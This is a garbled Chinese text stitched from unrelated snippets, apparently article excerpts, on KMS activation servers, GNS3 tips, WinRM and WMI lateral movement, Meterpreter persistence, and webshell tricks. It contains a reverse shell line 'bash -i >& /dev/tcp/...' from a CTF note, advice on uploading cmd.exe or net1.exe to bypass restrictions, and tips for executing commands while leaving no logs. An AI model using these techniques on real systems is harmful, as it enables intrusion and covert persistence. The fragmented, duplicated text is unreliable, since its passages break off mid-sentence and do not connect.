useradmin登录192.168.1.1查看ip,然后百度搜索ip,查看是否为公网IP。如果不是,拨打10000,申请切换公网IP即可。
趁nmap还在工作的时候,简单浏览了下网站的功能,伪静态,整个网站也没有什么动态功能
Meterpreter的脚本persistence.rb,他将创建一个meterprer服务,即使远程主机再次启动,该脚本依然可以让主机重新连接远程的攻击端口,由于meterpreter不需要身份验证,这也导致任何发现端口的黑客也可利用此渠道进入后门,在真实情况下,建议完成任务后尽快自行清理。
一直很想去试试搭建KMS服务器,一直也没有时间。最近空闲下来,专门研究了一下,其实十分简单。 而且vlmcsd支持几乎所有操作系统作为KMS服务器。 通过搭建后,支持Windows, Office激活。
指令:show options – 查看需要填写的参数和参数填写状态
https://docs.microsoft.com/zh-cn/windows-server/get-started/kmsclientkeys
slmgr /ipk x-x-x-x-x 安装产品密钥,也可以说是替换现有密钥,就是那个5×5的序列号。
安装NodeJS环境 下载地址:http://nodejs.cn/download/ 根据你的系统选择合适的下载
描述:自Windows8起微软官方的激活方式有两种方式:密匙激活(在线与电话激活)与KMS激活
ISO 镜像版本说明: (Consumer editions)包括:家庭版、教育版、专业版 (Business editions)包括:企业版、教育版、专业版
"Windows远程管理(WinRM)"是WS-Management协议(Web Services for Management,又名WSMan)的Microsoft实现,WS-Management Protocol是基于标准简单对象访问协议(SOAP)的对防火墙友好的协议。运行来自不同硬件和操作系统的硬件和操作供应商,以实现互操作(Microsoft Docs)。
Windows系统中能够通过KMS进行激活的一般称为VL版,即VOLUME授权版。我们可以自行搭建KMS激活服务器,实现每180天一次的自动激活,使得系统一直保持激活状态。这次就跟大家分享一下如何利用群晖NAS的Docker容器套件搭建KMS服务器,并演示如何利用我们自己的KMS服务器激活Windows操作系统与Microsoft Office。
威联通NAS利用Container Station容器管理器中的Docker搭建KMS激活服务器实现激活windows系统和office
Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。
D:\progra~1\GNS3\SecureCRT\SecureCRT.EXE /script D:\progra~1\GNS3\SecureCRT\Scripts\MYSecurecrt.vbs /arg %d /T /telnet %h %p
1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是cmd.com cmd.txt cmd.rar等
本文来自安全盒子,请点击原文链接查看原文。原文作者:黑色天使,如有版权问题请后台联系删除。
前提条件,当然是需要打开被远程的 Win10 系统的远程桌面的访问功能...,然后在目标 win10 主机上,使用自带的openssh 软件运行ssh反向代理命令:
云服务器大内网带宽的机型不少,对于内网带宽大于3Gbps的机器,使用iperf3压测时,可以多开几个进程,否则可能压不到上限。可以用iperf2或用微软的ctsTraffic。
WinRM(Windows Remote Management是WS-Management Protocol Microsoft 实现(具体体现为Win RM 服务)。
0x00 win2008(域控) 1、修改计算机名: 2、配置固定ip: 其中网关设置错误,应该为192.168.206.2,开始默认的网管 3、服务器管理器---角色: 4、配置域服务: do
2、配置固定ip: 其中网关设置错误,应该为192.168.206.2,开始默认的网管
众所周知 Windows 和 Office 是有批量授权的可以通过 KMS 的方式激活,之前给家里人安装的 win10 和 office 就采用了这种方式。
说明:FrpMgr是一个基于Frp的快速配置Web面板,可以一键配置生成客户端的Frp配置文件,远程安装Frp服务到任意一台服务器,让我们在使用配置Frp上方便很多。对于类似这种带Web面板的穿透工具,之前也发过不少,比如nps、lanproxy等,都挺不错的,有兴趣可以去了解下,这里就介绍下FrpMgr安装及使用。
当我们成功获取shell后,再次建立链接显得特别麻烦,那么有什么方法可以解决此问题呢。在前期的教程中,我讲过讲msf的进程转移的其他软件的方法,今天来看看另外的一种方法。 执行命令
NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows”文件和打印机共享”和SAMBA。
N1book---死亡ping命令 有时候命令执行的题目限制了字数或者某些函数被禁用了,那么此时可以用反弹shell的效果,连接题目的机器 一般来说,构造bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxxx 0>&1的方式,发送到客户端执行,但是有时候不一定可以,可能会报错啥的,所以此时可以在只记得vps中,新建一个页面,比如xxx.xxx.xxx.xxx/bash.php中的内容是bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxxx 0>&1,然
上一篇文章我们简单的解释了什么是WMI,WMI做什么,为什么使用WMI。本文是笔者在阅读国内部分的解释WMI横向移动的文章后写下的一篇文章,希望帮助同学们在攻防中进入横向移动后根据实际场景利用WMI来解决问题。在横向移动中的固定过程中一定离不开“信息收集”,然后分析信息根据实际场景(工作组或者域)来进行横向移动,至于使用什么工具,为什么使用这个工具,笔者使用WMI的意见。所以本文分为三个段落,信息收集、横向移动、部分意见。 信息收集。
SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的唯一标识符。
这几天用了一下Windows系统的“黑框”,即win+R键,发现有些命令都忘了,还得查,就总结了一下:
============================================================================= 注意:cmd的命令很多,需要用的时候可以查询即可!
Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用:
1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user
KMS,是 Key Management System 的缩写,也就是密钥管理系统。这里所说的 KMS,毋庸置疑就是用来激活 VOL 版本的 Windows 和 Office 的 KMS 啦。经常能在网上看到有人提供的 KMS 服务器地址,那么你有没有想过自己也来搞一个这样的服务呢?而这样的服务在 Github 上已经有开源代码实现了。 本文就是在这个开源代码的基础上,开发了适用于三大 Linux 发行版的一键安装 KMS 服务的脚本。
相信在座的各位白嫖党都想用到正版的Windows系统和正版的Office套装,市面上大多数的方案是从淘宝花几块钱买个数字激活码激活和用盗版的激活工具,有什么方法才能让我们用到名正言顺的正版呢?还真有,那就是kms激活。
WMI即Windows Management Instrumentation,用于管理正在运行的Windows主机。用户利用WMI可以轻松地与系统各类资源进行交互,如打开指定进程、远程启动计算机、设定指定程序在指定时间运行、查询Windows日志等。我们可以把它当作API来与Windows系统进行相互交流。在渗透测试的过程中,WMI的价值就是不需要下载和安装,因为WMI是Windows系统自带的功能,而且整个运行过程都在计算机内存中进行,操作记录不会在Winodws日志中留存。在前面的内容中对WMI有过介绍,因此不过多讲解原理。
KMS,是 Key Management System 的缩写,也就是密钥管理系统。这里所说的 KMS,毋庸置疑就是用来激活 VOL 版本的 Windows 和 Office 的 KMS 啦。经常能在网上看到有人提供的 KMS 服务器地址,那么你有没有想过自己也来搞一个这样的服务呢?而这样的服务在 Github 上已经有开源代码实现了。 本文就是在这个开源代码的基础上,开发了适用于三大 Linux 发行版的一键安装 KMS 服务的脚本。 本脚本适用环境 系统支持:CentOS 6+,Debian 7+,U
写这篇文章时,这次的渗透已经完成一周多了,当时也没有想到会要写文章出来,所以有一部截图是后来补上的,为了我的人身安全,有涉及到的敏感信息,我都会打码,请多多包涵。
可以看到,该项目的Todo,依旧想的是围绕注册表去进行修改,为此我们先把注册表传输文件放一边 WMIHACKER的文件传输部分
2020年初突然而至的新冠肺炎疫情让全国人民戛然停下了脚步,众多工控行业的从业者也响应祖国号召安分的呆在自己的家里享受难得的家人团聚时刻。但是我们所服务的各种工业生产企业依然在保证安全的情况下继续为抗击疫情生产急需的物资和保障全国人民的正常生活。当然疫情期间我们也不能随意出差,那么,如果你的客户需要你的远程技术支持你该怎么办呢?
当我们已经获取了远程系统的凭证(明文密码或 hash)时,可以直接通过3389远程登录进去收集信息、进行下一步的渗透,但是这样做的话会在系统上留下我们的操作记录,而且有可能邂逅管理员。大部分情况下,一个cmdshell 已经可以满足我们继续渗透的需求,所以不到万不得已的时候最好不要远程桌面连接(mstsc),而是通过远程执行命令的方式继续开展工作。本文整理了一些远程执行命令的姿势,测试环境如下:
WMIHACKER是一款用于远程主机连接工具,通过135端口进行命令执行,执行结果读取以及无需445端口进行文件传输。
slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX (基本不需要这个步骤)
最近限于自身的经济条件的限制,而我对网络的学习欲望愈发强烈。于是在这种情况下对使用GNS3模拟器模拟网络实验感兴趣起来。以下是我在使用GNS3过程中的一点小总结,特贴出来和大家共享。以下主要讲的是如何在GNS3中使用SecureCRT打开路由的配置页面和使用Wireshark软件进行抓包。
在这里需要用到一个脚本文件“DyRouter.vbs”。这里使用的就是在51下载上下的地址http://down.51cto.com/data/89880#
安装IIS服务器 在C:\inetpub\wwwroot网站目录下放一个www.rar文件并且浏览器能够访问到
【1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user
领取专属 10元无门槛券
手把手带您无忧上云